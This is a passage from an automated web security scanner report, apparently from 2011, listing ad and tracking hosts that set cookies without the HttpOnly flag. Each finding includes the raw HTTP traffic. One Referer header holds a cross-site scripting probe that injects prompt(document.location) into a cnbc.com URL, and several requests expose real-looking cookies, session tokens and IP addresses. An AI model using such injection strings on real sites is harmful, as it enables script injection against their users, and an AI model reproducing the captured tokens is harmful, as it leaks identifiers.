P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1209:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_0Setup.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.63. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?adv=274138&code=4X7ERY5MVFDBLHMTRJRP2G_n&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=fh'jT*YKlx8SkUshG%Lm!79C8vK!a(; ih="b!!!!0!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r#BKZI)BgvR/4M6EqoyOxB!!w[/!79C8#8K*x; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; lifb=0EA2)A9.-B!6-Nb'W00AM5Jkn/>M1M:>Rmw; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#O!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gZi!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 15:32:13 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 15:32:13 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

13.64. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1398295G52620110830164853&pub=IC13501&flash=10&time=2|14:57|-5&redir=http://a1.interclick.com/icaid/192677/tid/1ff795b7-a8cc-487d-bdd1-056be6aa440f/click.ic?$CTURL$&pos=x&dom=http://search.cnbc.com&r=0.07496926933526993 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=47AC0400-3F06-2A6D-020A-1BB000220100; PRca=|AKln*9320:2|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKlnAC0U:2|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FrlJ:2|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GW7X:2|GV2B:1|GV12:2|GSur:3|#; PRpc=|FrlJGW7X:2|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 14:57:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4496
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=47AC0400-C30A-57B3-020A-1BB000220100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKln*9320:4|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlnAC0U:4|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FrlJ:4|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GW7X:4|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FrlJGW7X:4|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

13.65. http://ads.rnmd.net/getAds

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.rnmd.net
Path:   /getAds

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getAds?delivery=jsonp&adType=banner&adDiv=rnmdad&appId=cnbc_web&t=other,OFFDECK&w=300&h=50&v=1&ck=1315339668282 HTTP/1.1
Host: ads.rnmd.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.cnbc.com/mytestc3e92%27-prompt(document.location)-%27f261e685920/ipecho.php

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:47 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
x-rnmd-pc: 208.91.189.56
Content-Type: application/x-javascript
Content-Length: 665
Set-Cookie: personCookie=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8; Expires=Wed, 05-Sep-2012 15:07:48 GMT
Connection: close

net.rnmd.sdk._private.JsonHelper.completeRequest({"personCookie":"208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8","adDiv":"rnmdad","htmlPayload":"<div style=\"text-align: center\">\r\n<a href=\"ht
...[SNIP]...

13.66. http://api.bizographics.com/v1/profile.redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315321124004408%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Tue, 06 Sep 2011 15:00:30 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ei=21&ti=95&vi=11&sti=28&sei=0&sci=0&sai=0&smi=0&pbi=0&sts=1315321124004408&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8&industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KV1QisJqhCw3Caj5XcunNcMDa7Re6IGD4lAPKWdnq4jBRAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtS8UYaNROq1hKa5pT7PlEtIEVUJBxdqAyA9AgipxBis0MPBYw4RisMnVT081fJFlZ0k4MipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive


13.67. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 401 Unauthorized
Date: Tue, 06 Sep 2011 17:05:58 GMT
Server: hi
Status: 401 Unauthorized
WWW-Authenticate: OAuth realm="http://api.twitter.com"
X-Transaction: 1315328758-6109-39893
X-RateLimit-Limit: 150
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 06 Sep 2011 17:05:58 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.00626
Content-Type: application/json; charset=utf-8
Content-Length: 94
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 7b997ce2b49ff6792faaf34e1fe6d8827fe21243
X-RateLimit-Reset: 1315332358
Set-Cookie: guest_id=v1%3A131532875890927681; domain=.twitter.com; path=/; expires=Fri, 06 Sep 2013 05:05:58 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH00Xj8yAToHaWQiJTUyNTA5ZjQ3YzU2NjU3%250ANDczMjkwZTE4ZjM0ODEyNmJjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--356f1bbdd959d20fe46289e9da9efb4258cc6a16; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close

{"error":"This method requires authentication.","request":"\/1\/statuses\/user_timeline.json"}

13.68. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=1000004&c3=&c4=&c5=&c6=&c10=&c15=&c16=&r=&ns__t=1315339017162&ns_c=UTF-8&c8=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&c7=http%3A%2F%2Fwww.cnbc.com%2F&c9=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D(The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM)%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 06 Sep 2011 14:56:57 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 14:56:57 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.69. http://c.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=3776433&resolution=1920&h=1200&camefrom=&u=http%3A//www.resourcepoint.net/&t=Resource%20Point%20%E2%80%93%20Experts%20in%20eCommerce%2C%20portal%20development%20%26%20content%20management&java=1&security=f2e27155&sc_random=0.36302077560685575&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323346.0; expires=Sun, 04-Sep-2016 15:35:46 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.70. http://clk.fetchback.com/serve/fb/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /serve/fb/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/click HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
